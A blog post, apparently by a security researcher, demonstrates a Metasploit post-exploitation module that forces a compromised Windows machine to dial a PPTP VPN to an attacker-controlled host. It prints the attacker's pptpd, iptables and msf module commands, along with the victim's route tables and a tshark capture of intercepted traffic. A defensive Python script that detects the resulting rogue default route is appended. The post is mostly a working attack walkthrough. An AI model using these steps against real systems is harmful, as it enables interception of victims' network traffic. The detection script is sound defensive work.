Recently I made a small post-exploitation module that takes advantage of the rasdial Windows client. The idea is to create an outbound VPN connection (PPTP) from the "victim" machine to a VPN server configured on the "attacker" machine. Once the PPTP tunnel is up we can forward all of the victim's traffic through it, giving us a man-in-the-middle position.
To do this we create a temporary .pbk (phonebook) file with certain parameters and force the rasdial client to use it. The most important parameter for the MITM is IpPrioritizeRemote. This option makes rasdial add a new default route pointing to the VPN peer IP of the attacker host. The new default gateway gets a better (lower) metric than the existing one, so all outbound traffic to the Internet or to any unknown network goes through our machine. Obviously we also need to configure forwarding and masquerading to get a real MITM, which is easily done with iptables. For the tests I used the pptpd package from Debian as the VPN server. The simplest configuration is:
ATTACKER MACHINE
root@Mordor:~# tail -2 /etc/pptpd.conf
localip 192.168.0.1
remoteip 192.168.0.234-238
root@Mordor:~# tail -1 /etc/ppp/chap-secrets
msf * m3taSpl01t *
root@Mordor:~# /etc/init.d/pptpd restart && netstat -putan | grep 1723
Restarting PPTP:
Stopping PPTP: pptpd.
Starting PPTP Daemon: pptpd.
tcp 0 0 0.0.0.0:1723 0.0.0.0:* LISTEN 22027/pptpd
root@Mordor:~# iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
root@Mordor:~# iptables -A FORWARD -i ppp0 -o wlan0 -j ACCEPT
root@Mordor:~# iptables -A FORWARD -i wlan0 -o ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT
root@Mordor:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@Mordor:~# ifconfig wlan0 | grep 82
inet addr:192.168.1.82 Bcast:192.168.1.255 Mask:255.255.255.0
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0
VICTIM MACHINE
C:\Documents and Settings\Peregrino>ipconfig
Configuración IP de Windows
Adaptador Ethernet Conexiones de red inalámbricas :
Sufijo de conexión específica DNS :
Dirección IP. . . . . . . . . . . : 192.168.1.131
Máscara de subred . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada : 192.168.1.1
C:\Documents and Settings\Peregrino>route PRINT
============================== ============================== ===============
Rutas activas:
Destino de red Máscara de red Puerta de acceso Interfaz Métrica
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.131 25
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
192.168.1.0 255.255.255.0 192.168.1.131 192.168.1.131 25
192.168.1.131 255.255.255.255 127.0.0.1 127.0.0.1 25
192.168.1.255 255.255.255.255 192.168.1.131 192.168.1.131 25
...
PPTP uses a TCP port as its control channel and GRE to carry the encapsulated data, so port 53 and 1723 must be reachable. Take this into account if you use it over a WAN.
With this configuration you only need to run the module with the parameters configured above (username and password):
msf post(pptp_tunnel) > set PASSWORD M3taSpl01t
PASSWORD => M3taSpl01t
msf post(pptp_tunnel) > set USERNAME bmerino
USERNAME => bmerino
msf post(pptp_tunnel) > set RHOST 192.168.1.82
RHOST => 192.168.1.82
msf post(pptp_tunnel) > set session 1
session => 1
msf post(pptp_tunnel) > run
[+] PhoneBook configuration written to C:\DOCUME~1\PEREGR~1\CONFIG~1\Temp\UotYzylPVA.pbk
[*] 60
[*] Establishing connection ...
[+] Connection Successful
[*] Phonebook deleted
[*] Post module execution completed
Once the tunnel has been created we can see the new interface on our evil host:
root@Mordor:~# ifconfig ppp0 | grep Link -A 1
ppp0 Link encap:Point-to-Point Protocol
inet addr:192.168.0.1 P-t-P:192.168.0.234 Mask:255.255.255.255
And we can see the new interface and the new route on the victim machine:
C:\Documents and Settings\Peregrino>ipconfig
Configuración IP de Windows
Adaptador Ethernet Conexiones de red inalámbricas :
Sufijo de conexión específica DNS :
Dirección IP. . . . . . . . . . . : 192.168.1.131
Máscara de subred . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada : 192.168.1.1
Adaptador PPP {34B7C931-D079-4817-8B5D- 93A3C8CE6890} :
Sufijo de conexión específica DNS :
Dirección IP. . . . . . . . . . . : 192.168.0.234
Máscara de subred . . . . . . . . : 255.255.255.255
Puerta de enlace predeterminada : 192.168.0.234
C:\Documents and Settings\Peregrino>route PRINT
============================== ============================== ===============
Rutas activas:
Destino de red Máscara de red Puerta de acceso Interfaz Métrica
0.0.0.0 0.0.0.0 192.168.0.234 192.168.0.234 1
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.131 26
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
192.168.0.234 255.255.255.255 127.0.0.1 127.0.0.1 50
192.168.0.255 255.255.255.255 192.168.0.234 192.168.0.234 50
192.168.1.0 255.255.255.0 192.168.1.131 192.168.1.131 25
192.168.1.82 255.255.255.255 192.168.1.131 192.168.1.131 25
...
...
The new default route has a metric of 1 and points to the newly created VPN interface. Now, if we leave tshark running on our wlan0 interface we can see all the outbound traffic of that host:
C:\Documents and Settings\Peregrino>ping www.metasploit.com
Haciendo ping a www.metasploit.com [208.118.237.137] con 32 bytes de datos:
Respuesta desde 208.118.237.137: bytes=32 tiempo=171ms TTL=47
Respuesta desde 208.118.237.137: bytes=32 tiempo=175ms TTL=47
...
Respuesta desde 208.118.237.137: bytes=32 tiempo=171ms TTL=47
Respuesta desde 208.118.237.137: bytes=32 tiempo=175ms TTL=47
...
root@Mordor:~# tshark -i wlan0 -R icmp
Capturing on wlan0
8.833077 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
8.993497 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
9.837086 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
9.999374 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
10.837070 192.168.1.82 -> 208.118.237.137 ICMP Echo (ping) request
10.992455 208.118.237.137 -> 192.168.1.82 ICMP Echo (ping) reply
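From the defender's side, the tell-tale sign of this technique is exactly what the route PRINT output above shows: a second 0.0.0.0/0 entry with metric 1 whose gateway is the PPP peer itself. The following script is an added example (not part of the post or the module) that parses Windows route PRINT output as shown on this page and flags a winning default route that leaves through anything other than the expected LAN interface; the sample table is constructed and the expected interface address is an assumption you supply.

```python
import re
from collections import namedtuple

# Constructed sample, modelled on the post's `route PRINT` output after the PPTP
# tunnel came up: a second default route with metric 1 via the PPP peer.
SAMPLE_ROUTE_PRINT = """\
Rutas activas:
Destino de red     Máscara de red   Puerta de acceso  Interfaz        Métrica
0.0.0.0            0.0.0.0          192.168.0.234     192.168.0.234   1
0.0.0.0            0.0.0.0          192.168.1.1       192.168.1.131   26
127.0.0.0          255.0.0.0        127.0.0.1         127.0.0.1       1
192.168.1.0        255.255.255.0    192.168.1.131     192.168.1.131   25
"""

Route = namedtuple("Route", "dest mask gateway iface metric")
_IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
_ROUTE_RE = re.compile(rf"^\s*{_IP}\s+{_IP}\s+{_IP}\s+{_IP}\s+(\d+)\s*$")

def parse_routes(text):
    """Return a Route per IPv4 row; banners and (localised) headers are skipped."""
    return [Route(*m.groups()[:4], int(m.group(5)))
            for m in map(_ROUTE_RE.match, text.splitlines()) if m]

def preferred_default(routes):
    """Windows forwards via the 0.0.0.0/0 entry with the lowest metric."""
    defaults = [r for r in routes if r.dest == r.mask == "0.0.0.0"]
    return min(defaults, key=lambda r: r.metric) if defaults else None

def find_rogue_default(text, expected_ifaces):
    """Return the winning default route when it leaves via an unexpected
    interface, plus the signs of a dial-up (PPP) default route: the gateway
    equals the interface (peer is on-link) and the metric beats the LAN default."""
    routes = parse_routes(text)
    best = preferred_default(routes)
    if best is None or best.iface in expected_ifaces:
        return None  # default route still goes out the expected adapter
    lan_defaults = [r for r in routes if r.dest == r.mask == "0.0.0.0"
                    and r.iface in expected_ifaces]
    return {
        "route": best,
        "on_link_peer": best.gateway == best.iface,
        "beats_lan_default": bool(lan_defaults)
        and best.metric < min(r.metric for r in lan_defaults),
    }

if __name__ == "__main__":
    # Assumed: 192.168.1.131 is the host's legitimate LAN adapter address.
    print(find_rogue_default(SAMPLE_ROUTE_PRINT, {"192.168.1.131"}))
```

Run it against the live table with `route PRINT` piped into the script, or schedule it as a host check; a hit with both flags set is worth correlating with a freshly written .pbk file in the user's Temp directory, as the module's output above shows.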
Here I leave a How-to video:
is it possible to implement this method through a reverse_https or firewall???
this method is fantastic ... :-)